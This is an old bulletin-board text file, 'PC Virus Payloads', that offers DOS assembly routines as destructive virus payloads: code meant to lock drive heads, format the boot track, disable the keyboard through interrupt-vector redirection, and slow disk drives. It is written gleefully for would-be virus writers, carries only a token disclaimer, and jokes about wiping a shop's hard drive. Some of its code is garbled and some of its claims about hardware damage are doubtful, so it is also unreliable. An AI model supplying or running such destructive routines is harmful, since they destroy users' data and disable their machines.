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- {6*************************************
- * *
- * {3PC Virus Payloads.{6 *
- * {1A text by Terminator of Destiny.{6 *
- * *
- * {2 Note - Dont give this file to {6 *
- * {2 lamers for Obvious reasons. {6 *
- * *
- *************************************
- {5Before I even get started please note
- that in {2most countries {5it is now
- }3illegal {5to write virus type programs.
- {6I do not accept responsiblity for any
- shit you get into ok ?
- {5Most of the information in this file
- comes from the {1excellent {5book {6`Computer
- Viruses - A high tech disease.' {3By
- Ralf Burger{5. Get it it's a kewl book &
- contains lots of source for writing a
- Virus, In various languages from
- Assembly to Pascal to {6BASIC !
- {3Here are some of the best routines ...
- {1Ok,they say a virus can not in any way
- harm any hardware. }1^BULLSHIT!^ the
- following {7Assembly {1routine causes the
- drive heads to move to an impossible
- possistion. }7Locking them! {5They can
- only be freed by opening up the {4PC {5and
- physically moving them back to their
- normal posistions! {2HEHEHE!
- {6** {7NOTE {6** {4Some PC Drive manufacturers
- however are aware of the Stupidity of
- the BIOS Calls and have installed
- hardware protection against this sort
- of thing happening.
- {7DESTROY DRIVE {3:- )
- {7
- mov ah,05
- mov dl,00
- ; Drive number! 0=a 1=b 2=c 3=d e.t.c.
- mov dh,00
- mov ch,80
- ; <--- Track number!!!! Impossible!!!
- mov cl,01
- mov a1,08
- int 13
- mov ah,00
- int 21
- {2Hehehe! {3Good eh ?
- {6Now how about destroying the disk
- itself ?
- {7
- mov ah,05
- mov dl,00
- mov dh,00
- mov ch,00
- mov cl,01
- mov al,08
- int 13
- mov ah,00
- int 21
- mov ah,05 {5; Format
- {7 mov dl,00 {5; A:
- {7 mov dh,00 {5; Head 0
- {7 mov ch,00 {5; Track 0
- {7 mov cl,01 {5; Sector 1
- {7 mov al,08 {5; 8 sectors/1 track
- {7 int 13 {5; Do it!
- {4heheh! {3bye bye boot track!
- {5 Now how about {1locking up the keyboard{5
- so the user can't reboot or {1CTRL-BREAK{5
- etc. ? }1Easy peasy ....!
- {7
- mov ah,35
- mov al,04
- int 21
- mov ax,es
- mov dx,bx
- mov ds,ax
- mov ah,25
- mov al,09
- int 21
- mov ax,0000
- int 21
- mov ah,35
- mov al,04
- int 21
- {5;* Redirect keyboard to vector 4
- ;* vector 4 points to an IRET
- {7
- mov ax,es
- mov dx,bx
- mov ds,ax
- mov ah,25
- mov al,09
- int 21
- mov ax,0000
- int 21
- {2!!!
- {4Slow down the drives ? }4Okay ....
- {7
- Mov ax,0000
- mov ds,ax
- mov bx,0522
- mov ah,ff {5 ; Drive rate
- {7 mov [BX],ah
- xor ax,ax
- int 13
- mov ah,00
- int 21
- {7That's all for now folks. For more,
- get the book mentioned above. It's
- one fucking good read!
- {2Termin8r!
- {1(Well there you are then. PC Vandalism
- explained. ^DESTINY^ cannot be held
- responsible for any trouble you get
- into - this information has been
- provided for informational purposes
- only. Think twice before formatiing
- the `{3Woolworths{1' hard drive -Ed)